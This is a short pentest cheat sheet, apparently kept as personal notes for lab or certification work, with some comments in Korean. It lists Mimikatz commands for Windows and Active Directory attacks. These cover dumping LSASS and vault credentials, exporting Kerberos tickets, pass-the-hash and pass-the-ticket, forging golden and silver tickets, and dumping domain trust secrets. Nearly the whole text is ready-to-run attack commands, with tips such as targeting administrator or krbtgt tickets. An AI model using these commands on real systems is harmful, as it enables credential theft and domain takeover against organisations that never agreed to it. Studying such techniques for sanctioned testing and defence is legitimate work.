**Does not work with [[Evil-WinRM]]** When errors because of version issue, use `/usr/share/windows-resources/mimikatz/` on Kali ```bash privilege::debug sekurlsa::credman # or privilege::debug vault::cred ``` # Dump Hash ```powershell privilege::debug sekurlsa::logonpasswords # msv: NTLM 해시 등 로컬/도메인 인증 관련 해시 # wdigest: 과거 평문 비밀번호를 보관하던 방식 # kerberos: Kerberos 티켓/키 또는 티켓과 관련된 정보 # tspkg/ssp/credman/cloudap: 다른 인증 제공자나 자격증명 저장소 결과 # 이름 끝에 '가 붙은건 컴퓨터 계정 # 같은 계정인데 해시 값이 다른 경우: # 서로 다른 인증 스토리지에서 가져온 값은 표현 방식과 내용이 다름. # 예) NTLM vs Kerberos Session Key ``` # Dump Tickets ```powershell # you will need to run the command prompt as an administrator # this will export all of the .kirbi tickets into the directory that you are in # or you can also use the base64 encoded tickets from Rubeus # when looking for which ticket to impersonate, it is recommended to look for an administrator ticket from the krbtgt .\mimikatz privilege::debug sekurlsa::tickets /export ``` # Pass the Hash ```powershell privilege::debug sekurlsa::pth /user:Administrator /domain:<domain> /ntlm:<hash> ``` # Pass the Ticket ```powershell .\mimikatz.exe # the command will cache and impersonate the given ticket kerberos::ptt <ticket> # verify that we successfully impersonated the ticket by listing our cached tickets klist # verify that you can look at the admin share dir \\<IP>\admin$ ``` # Golden / Silver Ticket Attack ```powershell # Golden ticket .\mimikatz.exe privilege::debug lsadump::lsa /inject /name:krbtgt kerberos::golden /user:<user> /domain:<domain> /sid:<sid> /krbtgt:<NTLM> /id:500 # Silver ticket .\mimikatz.exe privilege::debug lsadump::lsa /inject /name:<service_account> kerberos::golden /user:<user> /domain:<domain> /sid:<sid> /rc4:<NTLM> /id:1105 # OR kerberos::golden /user:<user> /domain:<domain> /sid:<sid> /rc4:<NTLM> /id:1105 /ptt misc::cmd ``` # Dump Trust Secrets ```bash mimikatz.exe lsadump::trust /patch ```